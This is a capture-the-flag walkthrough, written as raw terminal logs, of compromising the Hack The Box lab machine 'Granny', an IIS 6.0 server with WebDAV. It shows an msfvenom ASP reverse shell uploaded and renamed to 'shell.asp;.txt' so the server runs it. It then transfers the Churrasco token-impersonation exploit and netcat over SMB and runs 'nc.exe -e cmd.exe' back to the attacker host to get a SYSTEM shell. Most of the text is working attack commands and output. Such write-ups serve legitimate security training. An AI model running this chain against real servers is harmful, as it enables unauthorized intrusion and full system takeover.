RECON
root@kali:~/htb/granny# nmap -sC -sV -p- -vv -oA full 10.10.10.15
PORT   STATE SERVICE REASON          VERSION
80/tcp open  http    syn-ack ttl 127 Microsoft IIS httpd 6.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info: 
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unkown
|   Server Date: Mon, 09 Nov 2020 18:44:59 GMT
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

ENUM WEBDAV
root@kali:~/htb/granny# davtest -url http://10.10.10.15 -directory demo_dir -rand aaaa_upfileP0C
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://10.10.10.15
********************************************************
NOTE	Random string for this session: aaaa_upfileP0C
********************************************************
 Creating directory
MKCOL		SUCCEED:		Created http://10.10.10.15/demo_dir
********************************************************
 Sending test files
PUT	html	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.html
PUT	jsp	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.jsp
PUT	asp	FAIL
PUT	jhtml	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.jhtml
PUT	cfm	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.cfm
PUT	aspx	FAIL
PUT	pl	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.pl
PUT	txt	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.txt
PUT	cgi	FAIL
PUT	php	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.php
PUT	shtml	FAIL
********************************************************
 Checking for test file execution
EXEC	html	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.html
EXEC	jsp	FAIL
EXEC	jhtml	FAIL
EXEC	cfm	FAIL
EXEC	pl	FAIL
EXEC	txt	SUCCEED:	http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.txt
EXEC	php	FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/demo_dir
PUT File: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.html
PUT File: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.jsp
PUT File: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.jhtml
PUT File: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.cfm
PUT File: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.pl
PUT File: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.txt
PUT File: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.php
Executes: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.html
Executes: http://10.10.10.15/demo_dir/davtest_aaaa_upfileP0C.txt

ENUM WEBDAV WITH CADAVER
root@kali:~/htb/granny# cadaver http://10.10.10.15/
dav:/> ls
Listing collection `/': succeeded.
Coll:   _private                               0  Aib 12  2017
Coll:   _vti_bin                               0  Aib 12  2017
Coll:   _vti_cnf                               0  Aib 12  2017
Coll:   _vti_log                               0  Aib 12  2017
Coll:   _vti_pvt                               0  Aib 12  2017
Coll:   _vti_script                            0  Aib 12  2017
Coll:   _vti_txt                               0  Aib 12  2017
Coll:   aspnet_client                          0  Aib 12  2017
Coll:   demo_dir                               0  Samh  9 14:53
Coll:   images                                 0  Aib 12  2017
        _vti_inf.html                       1754  Aib 12  2017
        iisstart.htm                        1433  Feabh 21  2003
        pagerror.gif                        2806  Feabh 21  2003
        postinfo.html                       2440  Aib 12  2017

UPLOAD TEST FILE TO WEBDAV
root@kali:~/htb/granny# touch test.txt
root@kali:~/htb/granny# curl -T '/root/htb/granny/test.txt' 'http://10.10.10.15'

CREATE ASP REVERSE SHELL
root@kali:~/htb/granny# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1234 -f asp > shell.asp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38221 bytes
root@kali:~/htb/granny# cp shell.asp shell.txt

UPLOAD TO WEBDAV
root@kali:~/htb/granny# curl -T '/root/htb/granny/shell.txt' 'http://10.10.10.15'

dav:/> ls
Listing collection `/': succeeded.
Coll:   _private                               0  Aib 12  2017
Coll:   _vti_bin                               0  Aib 12  2017
Coll:   _vti_cnf                               0  Aib 12  2017
Coll:   _vti_log                               0  Aib 12  2017
Coll:   _vti_pvt                               0  Aib 12  2017
Coll:   _vti_script                            0  Aib 12  2017
Coll:   _vti_txt                               0  Aib 12  2017
Coll:   aspnet_client                          0  Aib 12  2017
Coll:   demo_dir                               0  Samh  9 14:53
Coll:   images                                 0  Aib 12  2017
        _vti_inf.html                       1754  Aib 12  2017
        iisstart.htm                        1433  Feabh 21  2003
        pagerror.gif                        2806  Feabh 21  2003
        postinfo.html                       2440  Aib 12  2017
        shell.txt                          38221  Samh  9 15:52
        test.txt                               0  Samh  9 15:36

MOVE SHELL TEXT FILE TO EXECUTABLE ASP FILE
dav:/> move shell.txt shell.asp;.txt
Moving `/shell.txt' to `/shell.asp%3b.txt':  succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll:   _private                               0  Aib 12  2017
Coll:   _vti_bin                               0  Aib 12  2017
Coll:   _vti_cnf                               0  Aib 12  2017
Coll:   _vti_log                               0  Aib 12  2017
Coll:   _vti_pvt                               0  Aib 12  2017
Coll:   _vti_script                            0  Aib 12  2017
Coll:   _vti_txt                               0  Aib 12  2017
Coll:   aspnet_client                          0  Aib 12  2017
Coll:   demo_dir                               0  Samh  9 14:53
Coll:   images                                 0  Aib 12  2017
        _vti_inf.html                       1754  Aib 12  2017
        iisstart.htm                        1433  Feabh 21  2003
        pagerror.gif                        2806  Feabh 21  2003
        postinfo.html                       2440  Aib 12  2017
        shell.asp;.txt                     38221  Samh  9 15:52
        test.txt                               0  Samh  9 15:36

SETUP REVERSE LISTENER
root@kali:~/htb/granny# cp /usr/share/windows-binaries/nc.exe .
root@kali:~/htb/granny# cp nc.exe nc
root@kali:~/htb/granny# nc -lvp 1234
listening on [any] 1234 ...

TRIGGER ASP REVERSE SHELL
http://10.10.10.15/shell.asp;.txt

GET LOW PRIV SHELL
root@kali:~/htb/granny# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.15: inverse host lookup failed: Unknown host
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.15] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 

PRIVESC
GET SYSTEMINFO
c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 3 Hours, 4 Minutes, 59 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1998 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 794 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,329 MB
Page File: In Use:         141 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

CHECK FOR EXPLOITS WITH WINDOWS EXPLOIT SUGGESTER
root@kali:~/htb/granny# python /root/Windows-Exploit-Suggester/windows-exploit-suggester.py --database /root/Windows-Exploit-Suggester/2020-11-04-mssb.xls --systeminfo /root/htb/granny/systeminfo.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*] 
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]   http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*] 
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]   http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]   http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*] 
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]   http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*] 
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*] 
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   http://www.exploit-db.com/exploits/34458/
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done

TRY CHURRASCO EXPLOIT BASED ON PRIV SeImpersonatePrivilege AND AS WINDOWS 2003 SERVER
root@kali:~# git clone https://github.com/Re4son/Churrasco.git
root@kali:~# cp Churrasco/churrasco.exe /root/htb/grandpa/

C:\>cd wmpub
cd wmpub

C:\wmpub>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\wmpub

04/12/2017  04:05 PM    <DIR>          .
04/12/2017  04:05 PM    <DIR>          ..
04/12/2017  04:05 PM    <DIR>          wmiislog
               0 File(s)              0 bytes
               3 Dir(s)  18,127,192,064 bytes free

TRANSFER CHURRASCO WITH IMPACKET
root@kali:~/impacket/impacket# impacket-smbserver share /root/htb/granny


C:\wmpub>copy \\10.10.14.8\share\churrasco.exe
copy \\10.10.14.8\share\churrasco.exe
        1 file(s) copied.

TRANSFER NETCAT
C:\wmpub>copy \\10.10.14.8\share\nc.exe
copy \\10.10.14.8\share\nc.exe
        1 file(s) copied.

C:\wmpub>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\wmpub

11/09/2020  11:54 PM    <DIR>          .
11/09/2020  11:54 PM    <DIR>          ..
11/09/2020  11:48 PM            31,232 churrasco.exe
11/09/2020  11:44 PM            59,392 nc.exe
04/12/2017  04:05 PM    <DIR>          wmiislog
               2 File(s)         90,624 bytes
               3 Dir(s)  18,127,286,272 bytes free

RUN CHURRASCO EXPLOIT
C:\wmpub>churrasco.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.8 443"
churrasco.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.8 443"
/churrasco/-->Current User: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 684 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 696 
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x734
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x72c
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!

START REVERSE LISTENER
root@kali:~/htb/granny# nc -lvp 443
listening on [any] 443 ...

GET ROOT SHELL
root@kali:~/htb/granny# nc -lvp 443
listening on [any] 443 ...
10.10.10.15: inverse host lookup failed: Unknown host
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.15] 1035
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\TEMP>whoami
whoami
nt authority\system


C:\WINDOWS\TEMP>dir C:\
dir C:\
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  09:19 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:21 PM    <DIR>          Program Files
11/09/2020  10:31 PM    <DIR>          WINDOWS
11/09/2020  11:54 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,127,278,080 bytes free

C:\WINDOWS\TEMP>dir "C:\Documents and Settings"
dir "C:\Documents and Settings"
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  09:19 PM    <DIR>          .
04/12/2017  09:19 PM    <DIR>          ..
04/12/2017  08:48 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  09:19 PM    <DIR>          Lakis
               0 File(s)              0 bytes
               5 Dir(s)  18,127,273,984 bytes free

GET USER FLAG
C:\WINDOWS\TEMP>type "C:\Documents and Settings\Lakis\Desktop\user.txt"
type "C:\Documents and Settings\Lakis\Desktop\user.txt"
###########################################

GET ROOT FLAG
C:\WINDOWS\TEMP>type "C:\Documents and Settings\Administrator\Desktop\root.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
########################################

